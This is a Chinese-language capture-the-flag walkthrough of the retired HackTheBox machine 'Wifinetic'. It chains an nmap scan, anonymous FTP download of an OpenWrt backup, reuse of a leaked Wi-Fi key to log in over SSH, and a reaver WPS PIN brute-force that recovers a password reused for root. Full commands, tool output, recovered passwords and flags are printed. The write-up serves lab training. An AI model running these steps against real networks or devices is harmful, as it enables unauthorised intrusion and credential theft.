HACKTHEBOX通关笔记——wifinetic靶机（已退役）

信息收集

端口扫描

nmap -sC -sV -A -p- --min-rate=10000 10.129.229.90
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-27 01:45 EST
Warning: 10.129.229.90 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.229.90
Host is up (0.43s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE    VERSION
21/tcp open  ftp        vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.14.18
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp          4434 Jul 31 11:03 MigrateOpenWrt.txt
| -rw-r--r--    1 ftp      ftp       2501210 Jul 31 11:03 ProjectGreatMigration.pdf
| -rw-r--r--    1 ftp      ftp         60857 Jul 31 11:03 ProjectOpenWRT.pdf
| -rw-r--r--    1 ftp      ftp         40960 Sep 11 15:25 backup-OpenWrt-2023-07-26.tar
|_-rw-r--r--    1 ftp      ftp         52946 Jul 31 11:03 employees_wellness.pdf
22/tcp open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
53/tcp open  tcpwrapped
Aggressive OS guesses: Linux 5.4 (96%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Linux 5.0 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 4.15 - 5.8 (93%), Adtran 424RG FTTH gateway (93%), Linux 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1720/tcp)
HOP RTT       ADDRESS
1   424.71 ms 10.10.14.1
2   432.78 ms 10.129.229.90

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.43 seconds

通过扫描结果可以看到ftp端口存在几个文件，看看有什么信息

ftp登录发现需要输入用户名

ftp 10.129.229.90
Connected to 10.129.229.90.
220 (vsFTPd 3.0.3)
Name (10.129.229.90:kali):

看到nmap扫描结果里面有个Anonymous，输入试试

Name (10.129.229.90:kali): Anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> la
?Invalid command.
ftp> ls
229 Entering Extended Passive Mode (|||40353|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp          4434 Jul 31 11:03 MigrateOpenWrt.txt
-rw-r--r--    1 ftp      ftp       2501210 Jul 31 11:03 ProjectGreatMigration.pdf
-rw-r--r--    1 ftp      ftp         60857 Jul 31 11:03 ProjectOpenWRT.pdf
-rw-r--r--    1 ftp      ftp         40960 Sep 11 15:25 backup-OpenWrt-2023-07-26.tar
-rw-r--r--    1 ftp      ftp         52946 Jul 31 11:03 employees_wellness.pdf
226 Directory send OK.

get下载下来看看

ftp> get MigrateOpenWrt.txt
local: MigrateOpenWrt.txt remote: MigrateOpenWrt.txt
229 Entering Extended Passive Mode (|||45924|)
150 Opening BINARY mode data connection for MigrateOpenWrt.txt (4434 bytes).
100% |**************************************************************************************************************|  4434        7.89 KiB/s    00:00 ETA
226 Transfer complete.
4434 bytes received in 00:00 (4.44 KiB/s)
ftp> get ProjectGreatMigration.pdf
local: ProjectGreatMigration.pdf remote: ProjectGreatMigration.pdf
229 Entering Extended Passive Mode (|||46499|)
150 Opening BINARY mode data connection for ProjectGreatMigration.pdf (2501210 bytes).
100% |**************************************************************************************************************|  2442 KiB    4.04 KiB/s    00:00 ETA
226 Transfer complete.
2501210 bytes received in 10:04 (4.03 KiB/s)
ftp> get ProjectOpenWRT.pdf
local: ProjectOpenWRT.pdf remote: ProjectOpenWRT.pdf
229 Entering Extended Passive Mode (|||47888|)
150 Opening BINARY mode data connection for ProjectOpenWRT.pdf (60857 bytes).
100% |**************************************************************************************************************| 60857       26.33 KiB/s    00:00 ETA
226 Transfer complete.
60857 bytes received in 00:02 (22.13 KiB/s)
ftp> get backup-OpenWrt-2023-07-26.tar
local: backup-OpenWrt-2023-07-26.tar remote: backup-OpenWrt-2023-07-26.tar
229 Entering Extended Passive Mode (|||49270|)
150 Opening BINARY mode data connection for backup-OpenWrt-2023-07-26.tar (40960 bytes).
100% |**************************************************************************************************************| 40960        3.24 KiB/s    00:00 ETA
226 Transfer complete.
40960 bytes received in 00:12 (3.13 KiB/s)
ftp> get employees_wellness.pdf
local: employees_wellness.pdf remote: employees_wellness.pdf
229 Entering Extended Passive Mode (|||43272|)
150 Opening BINARY mode data connection for employees_wellness.pdf (52946 bytes).
100% |**************************************************************************************************************| 52946        3.56 KiB/s    00:00 ETA
226 Transfer complete.
52946 bytes received in 00:14 (3.46 KiB/s)

文件浏览

按个查看文件看看有什么信息

在employees_wellness.pdf里面看到all_employees@wifinetic.htb和samantha.wood93@wifinetic.htb，简单看下内容一份人力资源经理发送的邮件，推出了员工健康计划

在ProjectGreatMigration.pdf里面看到主域wifinetic.htb

将10.129.229.90和wifinetic.htb加入hosts

ProjectOpenWRT.pdf和employees_wellness.pdf差不多，存在两个邮箱management@wifinetic.htb和olivia.walker17@wifinetic.htb

压缩包里存在很多文件，看看有价值的信息

passwd信息

root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
ntp:x:123:123:ntp:/var/run/ntp:/bin/false
dnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/false
logd:x:514:514:logd:/var/run/logd:/bin/false
ubus:x:81:81:ubus:/var/run/ubus:/bin/false
netadmin:x:999:999::/home/netadmin:/bin/false

/etc/config/wireless

config wifi-device 'radio0'
	option type 'mac80211'
	option path 'virtual/mac80211_hwsim/hwsim0'
	option cell_density '0'
	option channel 'auto'
	option band '2g'
	option txpower '20'

config wifi-device 'radio1'
	option type 'mac80211'
	option path 'virtual/mac80211_hwsim/hwsim1'
	option channel '36'
	option band '5g'
	option htmode 'HE80'
	option cell_density '0'

config wifi-iface 'wifinet0'
	option device 'radio0'
	option mode 'ap'
	option ssid 'OpenWrt'
	option encryption 'psk'
	option key 'VeRyUniUqWiFIPasswrd1!'
	option wps_pushbutton '1'

config wifi-iface 'wifinet1'
	option device 'radio1'
	option mode 'sta'
	option network 'wwan'
	option ssid 'OpenWrt'
	option encryption 'psk'
	option key 'VeRyUniUqWiFIPasswrd1!'

这里拿到一个密码VeRyUniUqWiFIPasswrd1!，但不确定用于哪里，其他文件都存在部分信息，但对于获取shell价值不大，尝试用这个密码登录ssh看看

sshpass -p 'VeRyUniUqWiFIPasswrd1!' ssh netadmin@10.129.229.90
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-162-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 27 Dec 2023 08:55:16 AM UTC

  System load:            0.04
  Usage of /:             65.0% of 4.76GB
  Memory usage:           6%
  Swap usage:             0%
  Processes:              228
  Users logged in:        0
  IPv4 address for eth0:  10.129.229.90
  IPv6 address for eth0:  dead:beef::250:56ff:feb9:8b0
  IPv4 address for wlan0: 192.168.1.1
  IPv4 address for wlan1: 192.168.1.23

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Sep 12 12:46:00 2023 from 10.10.14.23
netadmin@wifinetic:~$ whoami&&id
netadmin
uid=1000(netadmin) gid=1000(netadmin) groups=1000(netadmin)

再目录存在user.txt，获得user的flag

netadmin@wifinetic:~$ ls
user.txt
netadmin@wifinetic:~$ cat user.txt
c419f02a02652e537bad0fd6b6f19e11

提权

前面阅读文件可以看到于wif存在一定关系，查看下IP

netadmin@wifinetic:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.129.229.90  netmask 255.255.0.0  broadcast 10.129.255.255
        inet6 fe80::250:56ff:feb9:8b0  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:8b0  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:08:b0  txqueuelen 1000  (Ethernet)
        RX packets 1481248  bytes 89122298 (89.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 118893  bytes 10041697 (10.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 3497  bytes 211212 (211.2 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3497  bytes 211212 (211.2 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

mon0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        unspec 02-00-00-00-02-00-30-3A-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 101982  bytes 17956188 (17.9 MB)
        RX errors 0  dropped 101982  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.1  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::ff:fe00:0  prefixlen 64  scopeid 0x20<link>
        ether 02:00:00:00:00:00  txqueuelen 1000  (Ethernet)
        RX packets 3394  bytes 319824 (319.8 KB)
        RX errors 0  dropped 467  overruns 0  frame 0
        TX packets 3929  bytes 455515 (455.5 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.23  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::ff:fe00:100  prefixlen 64  scopeid 0x20<link>
        ether 02:00:00:00:01:00  txqueuelen 1000  (Ethernet)
        RX packets 993  bytes 138009 (138.0 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3394  bytes 380916 (380.9 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan2: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 02:00:00:00:02:00  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

可以看到存在wlan，使用iw dev查看wifi更多信息

netadmin@wifinetic:~$ iw dev
phy#2
        Interface mon0
                ifindex 7
                wdev 0x200000002
                addr 02:00:00:00:02:00
                type monitor
                txpower 20.00 dBm
        Interface wlan2
                ifindex 5
                wdev 0x200000001
                addr 02:00:00:00:02:00
                type managed
                txpower 20.00 dBm
phy#1
        Unnamed/non-netdev interface
                wdev 0x1000000f2
                addr 42:00:00:00:01:00
                type P2P-device
                txpower 20.00 dBm
        Interface wlan1
                ifindex 4
                wdev 0x100000001
                addr 02:00:00:00:01:00
                type managed
                txpower 20.00 dBm
phy#0
        Interface wlan0
                ifindex 3
                wdev 0x1
                addr 02:00:00:00:00:00
                ssid OpenWrt
                type AP
                channel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHz
                txpower 20.00 dBm

查看是否存在reaver信息，getcap -r / 2>/dev/null

netadmin@wifinetic:~$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/reaver = cap_net_raw+ep

找到了reaaver信息，对wifi进行暴力破解，reaver -i mon0 -b 02:00:00:00:00:00 -vv -c 1

netadmin@wifinetic:~$ reaver -i mon0 -b 02:00:00:00:00:00 -vv -c 1

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 1
[+] Waiting for beacon from 02:00:00:00:00:00
[+] Received beacon from 02:00:00:00:00:00
[+] Trying pin "12345670"
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
[+] Sending association request
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 1 seconds
[+] WPS PIN: '12345670'
[+] WPA PSK: 'WhatIsRealAnDWhAtIsNot51121!'
[+] AP SSID: 'OpenWrt'
[+] Nothing done, nothing to save.

拿到密码“WhatIsRealAnDWhAtIsNot51121!”，登录root

netadmin@wifinetic:~$ su
Password: 
root@wifinetic:/home/netadmin# whoami&&id
root
uid=0(root) gid=0(root) groups=0(root)

获得root权限flag

root@wifinetic:~# ls
root.txt  snap
root@wifinetic:~# cat root.txt
672e4f5122b20f0d909c77c94f3b67c4